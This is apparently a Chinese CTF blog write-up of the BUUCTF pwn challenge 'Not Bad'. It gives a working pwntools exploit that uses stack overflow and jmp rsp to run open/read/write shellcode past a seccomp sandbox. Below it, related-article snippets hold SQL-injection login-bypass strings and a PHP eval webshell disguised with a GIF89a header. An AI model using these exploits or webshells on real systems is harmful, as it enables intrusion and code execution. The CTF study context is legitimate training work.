BUUCTF之“[极客大挑战 2019]Not Bad 1”

最新推荐文章于 2025-03-29 15:54:59 发布
原创 最新推荐文章于 2025-03-29 15:54:59 发布 · 303 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文介绍了如何通过`seccomp-tools`检查可用系统调用,并运用`shellcraft`库进行高效的文件操作,如读写和创建文件。重点展示了如何设置context.binary和利用shellcode实现文件描述符3的使用。

WP:

from pwn import*
p=remote('node4.buuoj.cn',26870)
context.binary=ELF('./bad')
mmap_=0x123000
jmp_=0x400a01
paylado1=(asm(shellcraft.read(0,mmap_,0x100))+asm("mov rax,0x123000;call rax")).ljust(0x28,b'\x00')+p64(jmp_)+asm("sub rsp,0x30;jmp rsp")
p.sendafter("Easy shellcode, have fun!",paylado1)
shellcode=asm(shellcraft.open('./flag'))
shellcode+=asm(shellcraft.read(3,mmap_+0x50,0x50))
shellcode+=asm(shellcraft.write(1,mmap_+0x50,0x50))
p.send(shellcode)
p.interactive()

先盘点一下收获:

  1. orw更了解了一丝:可以利用工具seccomp-tools查看哪些系统调用能用
  2. shellcraft.read(open、write)等的使用非常方便
  3. 创建新文件时会使文件描述符(句柄)为3

本题奇怪的是:

context.binary=ELF('./bad')

如果不加这句程序报错。

最后:
文件描述符以及shellcraft的这种使用可以看这里

pwn】 [极客挑战 2019]Not Bad
Nothing
03-10 1244
例行检查 开了沙箱 程序逻辑很简单,存在0x18字节溢出,看是否能进行栈迁移,目前可控输入只有buf,但是buf只有0x20小不够rop,所以尝试别的方法。程序在最开始mmap了一块内存,可写可执行,那么接下来目标就是1.在这块内存上写shellcode 2.跳转过来执行 由于不能rop且栈是可执行的想到能不能进行jmp rsp。在程序中找到了这个指令。 那么就可以在buf上布置read以...
[BUUCTF]PWN——[极客挑战 2019]Not Bad详细解释
weixin_46521144的博客
03-25 1032
从这道题可以学到shellcode的一般使用方法,和orw的一般方法 这道题开启了secure computing mood 使用seccomp看到可以使用的函数 使用vmmap查看哪里可以写shellcode IDA中也有看到使用vmmap开启了一段内存 这里mmap参数类型是(起始地址,小,保护类,文件描述符等) 我们只需要关注保护类权限 PROT_READ是0x1 PROT_WRITE是0x2 PROT_EXEC是0x4 也就是read,write,execute的顺序,那么这里是6,也就是
[BUUCTF]PWN——[极客挑战 2019]Not Bad (orw_shellcode)
mcmuyanga的博客
01-30 2895
[极客挑战 2019]Not Bad 附件 步骤
极客挑战_2019_Not_Bad
z1r0的博客
01-17 2989
极客挑战_2019_Not_Bad shellcode题目 mmap了一块空间,加了沙盒来个orw。 可以考虑栈迁移,但是既然可以shellcode,那就看一下怎么使用 前面mmap了一块,可以将shellcode写到mmap那里,然后借助gadget跳到mmap去执行。 刚好有一个jmp rsp这个跳板,思路就是使用jmp rsp这个跳板跳到buf头中被写入的payload。再用shellcraft.read(0, mmap, 0x100) mov rax,0x123000;call rax这两
[BUUCTF-pwn]——[极客挑战 2019]Not Bad(ORW)(内涵peak小知识)
Y_peak的博客
03-31 604
[BUUCTF-pwn]——[极客挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的syscall,这是不安全的,比如程序劫持程序流后通过execve的syscall来getshell。所以可以通过seccomp_init、seccomp_rule_add、seccomp_load配合来ban掉一些系统调用. seccomp-tools: 沙盒工具, 可以查看那些系统调用可以被使用, 安装在我的
buuctf刷题之旅之web(一)
qq_50589021的博客
08-17 6839
2021-01-15 第一题:[HCTF 2018]WarmUp 这里懒得上传图片了,所以就直接笔记了 源代码里面有1.source.php,所以打开以后还会发先2.hint.php 1打开后会发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["s
BUUCTF-WEB
ccfly1012的博客
11-02 4192
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 837
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.youkuaiyun.com/weixin_44145820/article/details/105585889 https://blog.youkuaiyun.com/seaaseesa/article/details/105590591 https://blog.youkuaiyun.com/weixin_42151611/article/details/99228675 exp:
[极客挑战 2019]Not Bad刷题
qq_43766802的博客
09-28 637
检查下程序的保护措施 拖入ida发现程序打开了沙盒保护,随即用seccomp-tools工具查看下白名单 因此这题选择用orw来get flag 函数允许我们输入0x38个字节,但buf只有0x20小,并且只能溢出0x18个字节,用buf来装orw的汇编代码是绝对不够的,但程序一开始mmap了内存中的一段区域,我们可以利用这段区域来保存我们的shellcode,并发现该程序有jmp rsp,利用jmp rsp可以直接执行栈上的内容 write up from pwn import..
buuoj刷题记录 - [极客挑战 2019]Not Bad
qq_34010404的博客
03-28 443
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
BUUCTF [极客挑战 2019]Not Bad
最新发布
2401_85052854的博客
03-29 523
我们直接open根目录下的flag,然后把flag的内容读入到mmap中,再用write打印处mmap的值,这里解释一下为什么fd为3,因为我们是打开文件进行读入,0,1,2分别是标准输出,标准输入,标准错误,所以3之后才是打开文件的顺序,所以我们写上3.以下是完整的exp。在main看到这两个比较有用的函数,第一个函数一眼看过去就发现是有沙箱保护的,第二个函数就是正常的栈溢出函数,我们先看看程序开了什么保护。也是第一次做到沙箱的题,也熟练了一点orw的攻击方式。拿到题目放入ida,看看有什么函数。
[极客挑战 2019]Not Bad的另一种思路
chennbnbnb的博客
10-22 353
保护 漏洞 算上rbp只有0x20的溢出空间 思路1 利用jmp rsp的GG执行栈上的shellcode,这个思路用的人很多,就不再说了 思路2:不使用jmp rsp 如果需要开启shellcode,最常用的就是ret到shellcode的地址,为了获取shellcode地址,那么就有了两个选择 泄露栈地址,做不到 栈迁移到一个已知位置 通过leave指令使得rbp = 已知空间buf之后,需要在0x18长度内完成两件事情 向buf中写入exp leave+ret让rsp迁
BUUCTF-极客挑战2019
Atkx's Blog
01-27 822
[极客挑战2019]Http [极客挑战2019]upload 将里面的内容改为一句话木马 GIF89a <script language="php">eval($_POST['shell']);</script> /upload/test.phtml [极客挑战2019]PHP 访问靶机地址 提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag 查看一下index.php,发现要用get方式提交参数select 再查看class.php
BUUCTF_极客挑战 2019
qq_45628145的博客
05-02 377
EasySQL 进入题目,是一个登陆框,首先试一下万能密码,居然就这么登陆进去了????,获得flag。 Havefun 进去之后,啥都没有,看下源码,构造cat=dog获得flag。 Secret File 进入题目,看下源码,发现这个,访问。 接着访问action.php,但是一访问闪一下就里面换到了end.php。 于是抓下包。 访问secr3t.php 根据提示访问flag.p...
buuctf-web(极客挑战2019
qq_47804678的博客
02-08 438
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
BUUCTF[极客挑战 2019]BabySQL
网络空间安全学习
06-25 2461
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
Buuctf-[极客挑战 2019]HardSQL
m0_63563528的博客
04-13 365
的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格。我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入。拼接一下flag,把重复部分删咯,就可以成功提交。又得到了:98-8e23-3728c2f96a1d}报错注入回显嘛,直接获取数据库名“geek”空格被过滤了 ,怎样绕过呢?我来试一下:输入1'(or)#
BUUCTF[极客挑战 2019]Havefun
GUOGUO的博客
04-19 347
BUUCTF[极客挑战 2019]Havefun 一进去之后看到如下页面: 是猫猫晃动着尾巴,可爱~ 好了,言归正传:直接查看源代码,向下翻,看到: 那么这个题就很简单了,分析代码得知,我们传入一个cat的参数,其名为dog就可以了 构造payload: ?cat=dog 得到flag: 得到flag: ![QQ截图20220419001328](https://img-blog.csdnimg.cn/img_convert/3424b2f0b20bc90c9544339fa287987c.png)
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 5747
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
buuctf [极客挑战 2019]Upload 1
02-07
### 关于 BUUCTF 极客挑战 2019 中 Upload 1 题目分析 #### 背景介绍 BUUCTF 是一个知名的网络安全竞赛平台,其中的极客挑战系列题目涵盖了多种安全漏洞利用技巧。Upload 1 属于文件上传类题目,在这类题目中通常会涉及到服务器端对于上传文件类型的验证机制以及可能存在的绕过方法。 #### 文件上传漏洞原理 当 Web 应用程序允许用户上传文件时,如果对上传的内容缺乏严格的安全检查,则可能导致攻击者能够上传恶意脚本并执行任意代码。常见的防御措施包括但不限于 MIME 类型检测、扩展名过滤等[^1]。 #### 解题思路 针对此题目的具体实现方式可以归纳为以下几个方面: - **MIME 类型伪造** PHP 使用 `$_FILES` 数组来处理上传的数据,默认情况下仅依赖客户端提供的 Content-Type 头部信息判断文件类型。然而这些头部是可以被轻易篡改的。因此可以通过修改 HTTP 请求中的相应部分使服务端误认为所提交的是合法图片而非其他形式的可执行文件。 - **PHP 后门植入** 利用上述手段成功上传 .php 结尾或其他能被执行解释器解析运行的文件之后,便可以在该文件内嵌入一段用于远程控制目标主机的小段落,比如一句话木马: ```php <?php @eval($_POST['cmd']);?> ``` - **绕过白名单限制** 如果存在基于文件头特征码(magic number)或者图像尺寸小等方面更严格的校验逻辑的话,那么就需要寻找特定格式下既满足条件又隐藏有潜在威胁特性的样本作为载体;或者是探索是否有其它途径可以直接影响到最终保存路径从而规避掉这部分审核流程。 #### 实际操作案例展示 假设当前环境已经确认支持 GIF89a 开始标记并且不会因为后续附加内容而报错的情况下,我们可以构造这样一个混合体——即所谓的“GIFAR”(Gif+Jar) 攻击向量: ```gif GIF89a; <?php @eval($_POST['cmd']);?> ``` 将其命名为 `.jpg.php` 或类似的双后缀命名模式尝试突破单纯的字符串匹配规则限制,并通过浏览器访问触发反序列化过程完成提权动作获取 shell 访问权限。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值